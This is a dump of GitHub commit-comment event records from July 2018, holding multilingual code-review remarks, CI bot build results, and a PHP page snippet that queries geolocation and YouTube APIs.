{"id":"8032155709","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868095,"position":14,"line":14,"path":"lesson1/rect_tr.rb","commit_id":"307df4eee9eb05d552ac8fd92c5a90b1b375f508","created_at":"2018-07-28T11:56:20Z","updated_at":"2018-07-28T11:56:20Z","author_association":"NONE","body":"вместо or принято использовать ||"}},"created_at":"2018-07-28T11:56:20Z"}
{"id":"8032155902","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868096,"position":18,"line":18,"path":"lesson1/rect_tr.rb","commit_id":"307df4eee9eb05d552ac8fd92c5a90b1b375f508","created_at":"2018-07-28T11:56:29Z","updated_at":"2018-07-28T11:56:29Z","author_association":"NONE","body":"нет пустой строки в конце файла"}},"created_at":"2018-07-28T11:56:29Z"}
{"id":"8032156117","type":"CommitCommentEvent","actor":{"login":"Apindes"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29868097,"position":1,"line":1,"path":"js/form.js","commit_id":"913aaf68e387f6b1d84dca52e496deab886842de","created_at":"2018-07-28T11:56:41Z","updated_at":"2018-07-28T11:56:41Z","author_association":"COLLABORATOR","body":"Смотри, я думал включать определенные скрипты для определенных страниц на YS. В functions.php  в методе enqueque_scripts указать условия: если отображается сингл-пейдж, то один скрипт подключаем, если хоум например ,  то второй . и так далее"}},"created_at":"2018-07-28T11:56:41Z"}
{"id":"8032156156","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868098,"position":19,"line":18,"path":"lesson1/test.txt","commit_id":"307df4eee9eb05d552ac8fd92c5a90b1b375f508","created_at":"2018-07-28T11:56:42Z","updated_at":"2018-07-28T11:56:42Z","author_association":"NONE","body":"этот файл походу надо удалить"}},"created_at":"2018-07-28T11:56:42Z"}
{"id":"8032156447","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868099,"position":4,"line":4,"path":"lesson1/tr_area.rb","commit_id":"307df4eee9eb05d552ac8fd92c5a90b1b375f508","created_at":"2018-07-28T11:56:58Z","updated_at":"2018-07-28T11:56:58Z","author_association":"NONE","body":"стороны могут быть не целыми, надо сразу делать to_f"}},"created_at":"2018-07-28T11:56:58Z"}
{"id":"8032157529","type":"CommitCommentEvent","actor":{"login":"Apindes"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29868101,"position":1,"line":784,"path":"index.html","commit_id":"35f0ea151a3b434078f81b23bfbbef001a08dc3c","created_at":"2018-07-28T11:57:59Z","updated_at":"2018-07-28T11:57:59Z","author_association":"COLLABORATOR","body":"ok\r\n"}},"created_at":"2018-07-28T11:57:59Z"}
{"id":"8032157622","type":"CommitCommentEvent","actor":{"login":"Apindes"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29868102,"position":3,"line":6,"path":"js/scroll.js","commit_id":"35f0ea151a3b434078f81b23bfbbef001a08dc3c","created_at":"2018-07-28T11:58:06Z","updated_at":"2018-07-28T11:58:06Z","author_association":"COLLABORATOR","body":"ok\r\n\r\n\r\n"}},"created_at":"2018-07-28T11:58:06Z"}
{"id":"8032158423","type":"CommitCommentEvent","actor":{"login":"Apindes"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29868103,"position":27,"line":14,"path":"js/scroll.js","commit_id":"35f0ea151a3b434078f81b23bfbbef001a08dc3c","created_at":"2018-07-28T11:58:48Z","updated_at":"2018-07-28T11:58:48Z","author_association":"COLLABORATOR","body":"добавить через метод jQuery?"}},"created_at":"2018-07-28T11:58:48Z"}
{"id":"8032158725","type":"CommitCommentEvent","actor":{"login":"ClemsP"},"repo":{"name":"AtelierSoude/OpenRepairPlatform"},"payload":{"comment":{"id":29868105,"position":null,"line":null,"path":null,"commit_id":"2ec6c2d3fbab4e3c3edd13ddd4e60ddf39d7b1fa","created_at":"2018-07-28T11:59:03Z","updated_at":"2018-07-28T11:59:03Z","author_association":"COLLABORATOR","body":"@vbastien j'ai tenté de faire une pull request mais j'ai mal fait ! Sorry"}},"created_at":"2018-07-28T11:59:03Z"}
{"id":"8032161445","type":"CommitCommentEvent","actor":{"login":"Apindes"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29868118,"position":9,"line":100,"path":"index.html","commit_id":"6f9f235a17428f33a521375f3358f7a749089cd0","created_at":"2018-07-28T12:01:15Z","updated_at":"2018-07-28T12:01:15Z","author_association":"COLLABORATOR","body":"не уверен. Не помню почему я через див сделал. Возможно до этого юзал h2  таг с неподходящими стилями. Еще посмотрю\r\n\r\n"}},"created_at":"2018-07-28T12:01:15Z"}
{"id":"8032162829","type":"CommitCommentEvent","actor":{"login":"Apindes"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29868128,"position":5,"line":78,"path":"scss/_courses-list.scss","commit_id":"6f9f235a17428f33a521375f3358f7a749089cd0","created_at":"2018-07-28T12:02:30Z","updated_at":"2018-07-28T12:02:30Z","author_association":"COLLABORATOR","body":"ok\r\n\r\n"}},"created_at":"2018-07-28T12:02:30Z"}
{"id":"8032166111","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29868134,"position":null,"line":null,"path":null,"commit_id":"0af245e0ee1fe8cf39baec0f841b282eafe1aaa6","created_at":"2018-07-28T12:04:41Z","updated_at":"2018-07-28T12:04:41Z","author_association":"MEMBER","body":"If you want such updates run past you, set the port to not be `openmaintainer`."}},"created_at":"2018-07-28T12:04:41Z"}
{"id":"8032166476","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"TechReborn/TechReborn"},"payload":{"comment":{"id":29868135,"position":null,"line":null,"path":null,"commit_id":"e443c9bc708b0b1f4b2ffbe1339f8095f2765669","created_at":"2018-07-28T12:04:59Z","updated_at":"2018-07-28T12:04:59Z","author_association":"MEMBER","body":"I didnt mean to commit this with that message, this commit fixes some issues with the json files\r\n"}},"created_at":"2018-07-28T12:04:59Z"}
{"id":"8032166599","type":"CommitCommentEvent","actor":{"login":"mcallegari"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29868136,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-28T12:05:06Z","updated_at":"2018-07-28T12:05:06Z","author_association":"OWNER","body":"This should be it:\r\n```\r\nQColor FixtureUtils::applyColorFilter(QColor source, QColor filter)\r\n{\r\n    return QColor(source.redF() * filter.redF() * 255.0,\r\n                  source.greenF() * filter.greenF() * 255.0,\r\n                  source.blueF() * filter.blueF() * 255.0);\r\n}\r\n```"}},"created_at":"2018-07-28T12:05:06Z"}
{"id":"8032167387","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868139,"position":22,"line":22,"path":"lesson1/qd_eqt.rb","commit_id":"7b0228e26a55feff9786783ec36142cf6efbc32a","created_at":"2018-07-28T12:05:44Z","updated_at":"2018-07-28T12:05:44Z","author_association":"NONE","body":"бардак с отступами, отступы должны быть 2 пробела\r\n"}},"created_at":"2018-07-28T12:05:44Z"}
{"id":"8032167574","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868143,"position":4,"line":4,"path":"lesson1/qd_eqt.rb","commit_id":"7b0228e26a55feff9786783ec36142cf6efbc32a","created_at":"2018-07-28T12:05:53Z","updated_at":"2018-07-28T12:05:53Z","author_association":"NONE","body":"вот тут отступы не нужны"}},"created_at":"2018-07-28T12:05:53Z"}
{"id":"8032167947","type":"CommitCommentEvent","actor":{"login":"DeinFreund"},"repo":{"name":"ZeroK-RTS/Zero-K-Infrastructure"},"payload":{"comment":{"id":29868148,"position":null,"line":null,"path":null,"commit_id":"3a918a84a3ed0f41d5806634b3d2beff172b4068","created_at":"2018-07-28T12:06:11Z","updated_at":"2018-07-28T12:06:11Z","author_association":"MEMBER","body":"I reverted to make it compile again. This list isn't unused right now."}},"created_at":"2018-07-28T12:06:11Z"}
{"id":"8032168298","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29868151,"position":null,"line":null,"path":null,"commit_id":"883108b072f6739560cf812d5c7fdaf0855a4a9b","created_at":"2018-07-28T12:06:30Z","updated_at":"2018-07-28T12:06:30Z","author_association":"OWNER","body":"via #41 "}},"created_at":"2018-07-28T12:06:30Z"}
{"id":"8032168627","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868152,"position":22,"line":22,"path":"lesson1/qd_eqt.rb","commit_id":"7b0228e26a55feff9786783ec36142cf6efbc32a","created_at":"2018-07-28T12:06:49Z","updated_at":"2018-07-28T12:06:49Z","author_association":"NONE","body":"P.S. что будет если дискриминант будет отрицательным? "}},"created_at":"2018-07-28T12:06:49Z"}
{"id":"8032172013","type":"CommitCommentEvent","actor":{"login":"kent7301"},"repo":{"name":"kent7301/777"},"payload":{"comment":{"id":29868160,"position":1,"line":1,"path":"README.md","commit_id":"568932da446179c86437538cddc12c88094f974a","created_at":"2018-07-28T12:09:05Z","updated_at":"2018-07-28T12:09:05Z","author_association":"OWNER","body":"Hi"}},"created_at":"2018-07-28T12:09:05Z"}
{"id":"8032172034","type":"CommitCommentEvent","actor":{"login":"hoxton22"},"repo":{"name":"WowDevTools/CASCHost"},"payload":{"comment":{"id":29868161,"position":null,"line":null,"path":null,"commit_id":"a6eaf620dfb60a45e12f83ba7064c1e944788018","created_at":"2018-07-28T12:09:05Z","updated_at":"2018-07-28T12:09:05Z","author_association":"NONE","body":"works fine, thank u for update !"}},"created_at":"2018-07-28T12:09:05Z"}
{"id":"8032176489","type":"CommitCommentEvent","actor":{"login":"GhanshyamSMC"},"repo":{"name":"GhanshyamSMC/LinuxConfigration"},"payload":{"comment":{"id":29868170,"position":null,"line":null,"path":null,"commit_id":"ac40e8d677a127c37a2bfb8358ca2cd8a4abceba","created_at":"2018-07-28T12:12:57Z","updated_at":"2018-07-28T12:12:57Z","author_association":"OWNER","body":"fg"}},"created_at":"2018-07-28T12:12:57Z"}
{"id":"8032177410","type":"CommitCommentEvent","actor":{"login":"necumnecum"},"repo":{"name":"cisco/openh264"},"payload":{"comment":{"id":29868171,"position":null,"line":null,"path":null,"commit_id":"4e7a29f3affdc2b10815f5093b654c40fd36edab","created_at":"2018-07-28T12:13:43Z","updated_at":"2018-07-28T12:13:43Z","author_association":"NONE","body":":D\r\n"}},"created_at":"2018-07-28T12:13:43Z"}
{"id":"8032177761","type":"CommitCommentEvent","actor":{"login":"LasTshaMAN"},"repo":{"name":"golang/mock"},"payload":{"comment":{"id":29868174,"position":null,"line":null,"path":null,"commit_id":"87f106fccd7e3ced294a19e86bebd7846911690a","created_at":"2018-07-28T12:14:06Z","updated_at":"2018-07-28T12:14:06Z","author_association":"NONE","body":"@MOZGIII Hi\r\n\r\nStumbled upon this thread, also was looking for the difference between `go get` / `go install`.\r\nI think, `go install` is a subset of `go get` (after downloading the package `go get` calls `go install` or something like that). Go install compiles `mockgen` tool and puts it under `$GOPATH/bin`.\r\n\r\nThe thing is, when we call `go get github.com/golang/mock/gomock` we download not only `gomock` folder (and corresponding `gomock` package), but also the rest of the `mock` repository as well (that is `mockgen` folder) - I didn't figure out why that is just yet, but looks like this is the way it works.\r\nThus, it is enough for us to call `go install github.com/golang/mock/mockgen` to create `mockgen` instead of `go get github.com/golang/mock/mockgen` as `mockgen` source code is already there.\r\n\r\nSo, my question would be - how is that `go get github.com/golang/mock/gomock` downloads `mockgen` source code also ?"}},"created_at":"2018-07-28T12:14:06Z"}
{"id":"8032178591","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":29868177,"position":4,"line":120,"path":"components/family-studies/migrations/pom.xml","commit_id":"4288dbdb225e87e7203ab43f6489cdba5d75e6e9","created_at":"2018-07-28T12:14:51Z","updated_at":"2018-07-28T12:14:51Z","author_association":"MEMBER","body":"There is no real way of testing a method declaration in an interface, but that is still considered code. For that reason, interfaces (except for default methods) are always considered 100% covered. Removing code from an interface thus decreases the percentage of \"tested\" code."}},"created_at":"2018-07-28T12:14:51Z"}
{"id":"8032179802","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29868182,"position":null,"line":null,"path":null,"commit_id":"25080c15c4b493f25d45dd752321c698f1641524","created_at":"2018-07-28T12:15:53Z","updated_at":"2018-07-28T12:15:53Z","author_association":"MEMBER","body":"Actually nope, some of the  /*[[base-color]]*/ are not being replaced by USo."}},"created_at":"2018-07-28T12:15:53Z"}
{"id":"8032184846","type":"CommitCommentEvent","actor":{"login":"Namdrib"},"repo":{"name":"Namdrib/java-minesweeper"},"payload":{"comment":{"id":29868189,"position":null,"line":null,"path":null,"commit_id":"d2612121116d872800ca4daec6809331bd150f7d","created_at":"2018-07-28T12:20:10Z","updated_at":"2018-07-28T12:20:10Z","author_association":"OWNER","body":"Issue #11 "}},"created_at":"2018-07-28T12:20:10Z"}
{"id":"8032187717","type":"CommitCommentEvent","actor":{"login":"SKJJ11"},"repo":{"name":"ldqk/softs"},"payload":{"comment":{"id":29868197,"position":null,"line":null,"path":null,"commit_id":"2310ccaefb2af30c310f1ffa0e779928e8f80e81","created_at":"2018-07-28T12:22:35Z","updated_at":"2018-07-28T12:22:35Z","author_association":"NONE","body":"确实佩服 大兄弟\r\n"}},"created_at":"2018-07-28T12:22:35Z"}
{"id":"8032195671","type":"CommitCommentEvent","actor":{"login":"konphorm"},"repo":{"name":"socketbind/tftp4j"},"payload":{"comment":{"id":29868213,"position":null,"line":null,"path":null,"commit_id":"07f81e965db0d3d54e9866b816e25c1ee1cfc416","created_at":"2018-07-28T12:29:41Z","updated_at":"2018-07-28T12:29:41Z","author_association":"NONE","body":"Any chance you remember what was the motivation for this patch?\r\n\r\nDid you run into buggy clients that did not play nice with this?"}},"created_at":"2018-07-28T12:29:41Z"}
{"id":"8032197805","type":"CommitCommentEvent","actor":{"login":"akokoo"},"repo":{"name":"akokoo/akokoo.github.io"},"payload":{"comment":{"id":29868220,"position":null,"line":null,"path":null,"commit_id":"d0cc58e2e23d3f095b8d4b5dc6a5893c640ad5f1","created_at":"2018-07-28T12:31:10Z","updated_at":"2018-07-28T12:31:10Z","author_association":"OWNER","body":"old server install"}},"created_at":"2018-07-28T12:31:10Z"}
{"id":"8032200333","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29868221,"position":null,"line":null,"path":null,"commit_id":"b31641eb9d53aaf0c3f4b65d5380857978d0aaf9","created_at":"2018-07-28T12:33:24Z","updated_at":"2018-07-28T12:33:24Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-28T12:33:24Z"}
{"id":"8032200990","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29868225,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-28T12:33:59Z","updated_at":"2018-07-28T12:33:59Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2304 of 2304 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-28T12:33:59Z"}
{"id":"8032202720","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29868229,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-28T12:35:20Z","updated_at":"2018-07-28T12:35:20Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T12:35:20Z"}
{"id":"8032210992","type":"CommitCommentEvent","actor":{"login":"biscmar"},"repo":{"name":"biscmar/TCUconfig"},"payload":{"comment":{"id":29868236,"position":null,"line":null,"path":null,"commit_id":"1e58fe66e58302c3342f4f1a498a5cbf3f098cf9","created_at":"2018-07-28T12:42:10Z","updated_at":"2018-07-28T12:42:10Z","author_association":"OWNER","body":"#17"}},"created_at":"2018-07-28T12:42:10Z"}
{"id":"8032211138","type":"CommitCommentEvent","actor":{"login":"belst"},"repo":{"name":"w0bm/w0bm-rs"},"payload":{"comment":{"id":29868237,"position":9,"line":76,"path":"src/main.rs","commit_id":"438e4242c425846e532c9c716fb934efc31a3d4a","created_at":"2018-07-28T12:42:18Z","updated_at":"2018-07-28T12:42:18Z","author_association":"CONTRIBUTOR","body":"scope `/video/`"}},"created_at":"2018-07-28T12:42:18Z"}
{"id":"8032211970","type":"CommitCommentEvent","actor":{"login":"elphyrecoin"},"repo":{"name":"elphyrecoin/elphyrecoin"},"payload":{"comment":{"id":29868240,"position":null,"line":null,"path":null,"commit_id":"9b2b899141863e69de1eb8e862f5bafa713649a0","created_at":"2018-07-28T12:42:59Z","updated_at":"2018-07-28T12:42:59Z","author_association":"OWNER","body":"- version update\r\n- /core/Currency.cpp : no more debug \"Reward...\" in the daemon logs..."}},"created_at":"2018-07-28T12:42:59Z"}
{"id":"8032215268","type":"CommitCommentEvent","actor":{"login":"nicolodavis"},"repo":{"name":"google/boardgame.io"},"payload":{"comment":{"id":29868252,"position":null,"line":null,"path":null,"commit_id":"36fc47f97a75d55ceedb4ab0506d3b9c2c6d4419","created_at":"2018-07-28T12:45:48Z","updated_at":"2018-07-28T12:45:48Z","author_association":"COLLABORATOR","body":"#7 "}},"created_at":"2018-07-28T12:45:48Z"}
{"id":"8032215365","type":"CommitCommentEvent","actor":{"login":"ch8936"},"repo":{"name":"yjqiang/bilibili-live-tools"},"payload":{"comment":{"id":29868253,"position":null,"line":null,"path":null,"commit_id":"f002a5b9df3fdd1088bb204f5b373a4a56542c70","created_at":"2018-07-28T12:45:53Z","updated_at":"2018-07-28T12:45:53Z","author_association":"NONE","body":"应用这个更新后，领不到辣条了"}},"created_at":"2018-07-28T12:45:53Z"}
{"id":"8032215974","type":"CommitCommentEvent","actor":{"login":"nicolodavis"},"repo":{"name":"google/boardgame.io"},"payload":{"comment":{"id":29868254,"position":null,"line":null,"path":null,"commit_id":"0bc31d62e18132517436154cce448d67dffb916a","created_at":"2018-07-28T12:46:23Z","updated_at":"2018-07-28T12:46:23Z","author_association":"COLLABORATOR","body":"#7 "}},"created_at":"2018-07-28T12:46:23Z"}
{"id":"8032216935","type":"CommitCommentEvent","actor":{"login":"zxc751176723"},"repo":{"name":"digitalbitbox/2FA-app"},"payload":{"comment":{"id":29868258,"position":null,"line":null,"path":null,"commit_id":"10f50356a141de8a8b3eacda1b30ebb6c3ac797a","created_at":"2018-07-28T12:47:16Z","updated_at":"2018-07-28T12:47:16Z","author_association":"NONE","body":"看不悟"}},"created_at":"2018-07-28T12:47:16Z"}
{"id":"8032217879","type":"CommitCommentEvent","actor":{"login":"alex2000ying"},"repo":{"name":"nailperry-zd/The-Economist"},"payload":{"comment":{"id":29868259,"position":null,"line":null,"path":null,"commit_id":"5192e15d1b3d54eb81e7614692b2bd75ae74dad5","created_at":"2018-07-28T12:48:08Z","updated_at":"2018-07-28T12:48:08Z","author_association":"NONE","body":"very good"}},"created_at":"2018-07-28T12:48:08Z"}
{"id":"8032218526","type":"CommitCommentEvent","actor":{"login":"alex2000ying"},"repo":{"name":"nailperry-zd/The-Economist"},"payload":{"comment":{"id":29868260,"position":null,"line":null,"path":null,"commit_id":"5192e15d1b3d54eb81e7614692b2bd75ae74dad5","created_at":"2018-07-28T12:48:36Z","updated_at":"2018-07-28T12:48:36Z","author_association":"NONE","body":"Can't download\r\n\r\n"}},"created_at":"2018-07-28T12:48:36Z"}
{"id":"8032225060","type":"CommitCommentEvent","actor":{"login":"alex2000ying"},"repo":{"name":"nailperry-zd/The-Economist"},"payload":{"comment":{"id":29868276,"position":null,"line":null,"path":null,"commit_id":"6eecb3603d92cb6fbefc1f503050ddedc2550722","created_at":"2018-07-28T12:53:49Z","updated_at":"2018-07-28T12:53:49Z","author_association":"NONE","body":"can download\r\n"}},"created_at":"2018-07-28T12:53:49Z"}
{"id":"8032227391","type":"CommitCommentEvent","actor":{"login":"Zac-HD"},"repo":{"name":"HypothesisWorks/hypothesis"},"payload":{"comment":{"id":29868290,"position":null,"line":null,"path":null,"commit_id":"dfe0152dd8693d284f0b7b3035764205b6ccd365","created_at":"2018-07-28T12:55:43Z","updated_at":"2018-07-28T12:55:43Z","author_association":"MEMBER","body":"Also needs to remove RELEASE.rst :sob: "}},"created_at":"2018-07-28T12:55:43Z"}
{"id":"8032230252","type":"CommitCommentEvent","actor":{"login":"korosuke613"},"repo":{"name":"korosuke613/etrobocon2018"},"payload":{"comment":{"id":29868297,"position":6,"line":0,"path":"str/apps/src/LeftNormalCourse.cpp","commit_id":"0c7440f96758dac386eb7120eab5e8c19d0883d6","created_at":"2018-07-28T12:58:01Z","updated_at":"2018-07-28T12:58:01Z","author_association":"OWNER","body":"ここはなんで17なの？"}},"created_at":"2018-07-28T12:58:01Z"}
{"id":"8032231348","type":"CommitCommentEvent","actor":{"login":"saitirumala"},"repo":{"name":"saitirumala/boostrap-App"},"payload":{"comment":{"id":29868301,"position":null,"line":null,"path":null,"commit_id":"04ce491d49eaaef47bdad2f18828982c4c39b934","created_at":"2018-07-28T12:58:52Z","updated_at":"2018-07-28T12:58:52Z","author_association":"OWNER","body":"add"}},"created_at":"2018-07-28T12:58:52Z"}
{"id":"8032231620","type":"CommitCommentEvent","actor":{"login":"alex2000ying"},"repo":{"name":"nailperry-zd/The-Economist"},"payload":{"comment":{"id":29868302,"position":null,"line":null,"path":null,"commit_id":"f0cb4573a149d9fe65de66365ea1c5ded1335705","created_at":"2018-07-28T12:59:04Z","updated_at":"2018-07-28T12:59:04Z","author_association":"NONE","body":"Thanks\r\n"}},"created_at":"2018-07-28T12:59:04Z"}
{"id":"8032233660","type":"CommitCommentEvent","actor":{"login":"masscontrolx"},"repo":{"name":"apilayer/freegeoip"},"payload":{"comment":{"id":29868316,"position":null,"line":null,"path":null,"commit_id":"3f942d1392f6439bda0f67b3c650ce468ebdba8e","created_at":"2018-07-28T13:00:32Z","updated_at":"2018-07-28T13:00:32Z","author_association":"NONE","body":"Всем привет, подключил вместо freegeoip.net/json/ http://api.ipstack.com/check?access_key=My_Api_Ipstack&output=json&legacy=1 и теперь определяет , что я с болгарии, хотя менял ip адреса, ранее было подключено на сайте таким образом:\r\n`<?php\r\nrequire_once 'maincore.php';\r\nrequire_once 'countries.php';\r\n\r\n$tpl->assign(\"current\",\"trends\");\r\n$tpl->assign(\"title\",\"Trends\");\r\n$geo = json_decode(file_get_contents(\"http://freegeoip.net/json/\".$_SERVER['REMOTE_ADDR']),true);\r\n$geo['country_code'] = strtolower($geo['country_code']);\r\n$tpl->assign(\"countries\",$countries);\r\nif(!$_GET['country'] || !$countries[$_GET['country']]) {\r\n\tif($geo['country_code'] && $countries[$geo['country_code']]) {\r\n\t\t$country = $geo['country_code'];\r\n\t\t$cname = $countries[$geo['country_code']];\r\n\t} else {\r\n\t\t$country = 'us';\r\n\t\t$cname = \"United State\";\r\n\t}\r\n} else {\r\n    $country = $_GET['country'];\r\n    $cname = $countries[$_GET['country']];\r\n}\r\n$tpl->assign(\"country\",$country);\r\n$tpl->assign(\"cname\",$cname);\r\n$data = json_decode(file_get_contents(\"https://www.googleapis.com/youtube/v3/videos?part=contentDetails%2CtopicDetails%2Csnippet%2Cstatistics&chart=mostPopular&regionCode=\".strtoupper($country).\"&maxResults=48&key=My_API_YouTube\"),true);\r\n\r\n#print_r($data);\r\nforeach($data['items'] as $i=>$v) {\r\n    $data['items'][$i]['contentDetails']['duration'] = covtime($v['contentDetails']['duration']);\r\n    $data['items'][$i]['snippet']['publishedAt'] = time_elapsed_string(($data['items'][$i]['snippet']['publishedAt']));\r\n\t$to_sitemap[] = \"/video/\".$data['items'][$i]['id'].\"/\".str2url(false,$data['items'][$i]['snippet']['title']).\".html\";\r\n}\r\n$data = $data['items'];\r\n#print_r($to_sitemap);\r\nif($to_sitemap) {\r\n\t\t\t\t$i = 0;\r\n\t\t\t\t$stop = false;\r\n\t\t\t\twhile(!$stop) {\r\n\t\t\t\t\tif(!file_exists(\"sitemaps/urls\".$i.\".txt\")) {\r\n\t\t\t\t\t\t$last_sitemap = $i-1;\r\n\t\t\t\t\t\tif($last_sitemap<0) {\r\n\t\t\t\t\t\t\t$last_sitemap = 0;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t$sitemap = file(\"sitemaps/urls\".$last_sitemap.\".txt\");\r\n\t\t\t\t\t\tforeach($to_sitemap as $ts) {\r\n\t\t\t\t\t\t\t$sitemap[] = $ts.\"\\n\";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t$sitemap = array_unique($sitemap);\r\n\t\t\t\t\t\tif(count($sitemap)>40000) {\r\n\t\t\t\t\t\t\t$last_sitemap = $last_sitemap+1;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tfile_put_contents(\"sitemaps/urls\".$last_sitemap.\".txt\",implode(\"\",$sitemap));\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$i++;\r\n\t\t\t\t}\r\n\t\t\t}\r\n$tpl->assign(\"res\",$data);\r\n$tpl->display(\"frontend/trends.tpl\");`"}},"created_at":"2018-07-28T13:00:32Z"}
{"id":"8032234003","type":"CommitCommentEvent","actor":{"login":"alex2000ying"},"repo":{"name":"nailperry-zd/The-Economist"},"payload":{"comment":{"id":29868320,"position":null,"line":null,"path":null,"commit_id":"7a9e803a0fdc03afa43a7899e7f0831413440a59","created_at":"2018-07-28T13:00:47Z","updated_at":"2018-07-28T13:00:47Z","author_association":"NONE","body":"keep on download\r\n"}},"created_at":"2018-07-28T13:00:47Z"}
{"id":"8032236794","type":"CommitCommentEvent","actor":{"login":"bleu48"},"repo":{"name":"yaneurao/YaneuraOu"},"payload":{"comment":{"id":29868338,"position":null,"line":null,"path":null,"commit_id":"2458e32e518438db19cea57239e77b1864aeed14","created_at":"2018-07-28T13:02:53Z","updated_at":"2018-07-28T13:02:53Z","author_association":"NONE","body":"これにid nameとid authorも対応するとエンジン名と設定を統合的に管理出来て便利ですね。"}},"created_at":"2018-07-28T13:02:53Z"}
{"id":"8032238124","type":"CommitCommentEvent","actor":{"login":"alex2000ying"},"repo":{"name":"nailperry-zd/The-Economist"},"payload":{"comment":{"id":29868345,"position":null,"line":null,"path":null,"commit_id":"81e33ca9663f3b2d3a44e875009c9b30e9b96859","created_at":"2018-07-28T13:04:00Z","updated_at":"2018-07-28T13:04:00Z","author_association":"NONE","body":"thanks\r\n"}},"created_at":"2018-07-28T13:04:00Z"}
{"id":"8032238550","type":"CommitCommentEvent","actor":{"login":"alex2000ying"},"repo":{"name":"nailperry-zd/The-Economist"},"payload":{"comment":{"id":29868346,"position":null,"line":null,"path":null,"commit_id":"81e33ca9663f3b2d3a44e875009c9b30e9b96859","created_at":"2018-07-28T13:04:21Z","updated_at":"2018-07-28T13:04:21Z","author_association":"NONE","body":"very good\r\n"}},"created_at":"2018-07-28T13:04:21Z"}
{"id":"8032238841","type":"CommitCommentEvent","actor":{"login":"vstakhov"},"repo":{"name":"vstakhov/rspamd"},"payload":{"comment":{"id":29868347,"position":10,"line":679,"path":"src/libmime/message.c","commit_id":"6a1a93fffccd1344c87b33d7baacf9d25b5ba97b","created_at":"2018-07-28T13:04:35Z","updated_at":"2018-07-28T13:04:35Z","author_association":"OWNER","body":"Oh, that should be `rspamd_lc_cmp (mime_part->parsed_data.begin, xhtml_tok.begin, xhtml_tok.len) == 0` instead of `rspamd_lc_cmp (mime_part->parsed_data.begin, xhtml_tok.begin, xhtml_tok.len)` in a boolean context!"}},"created_at":"2018-07-28T13:04:35Z"}
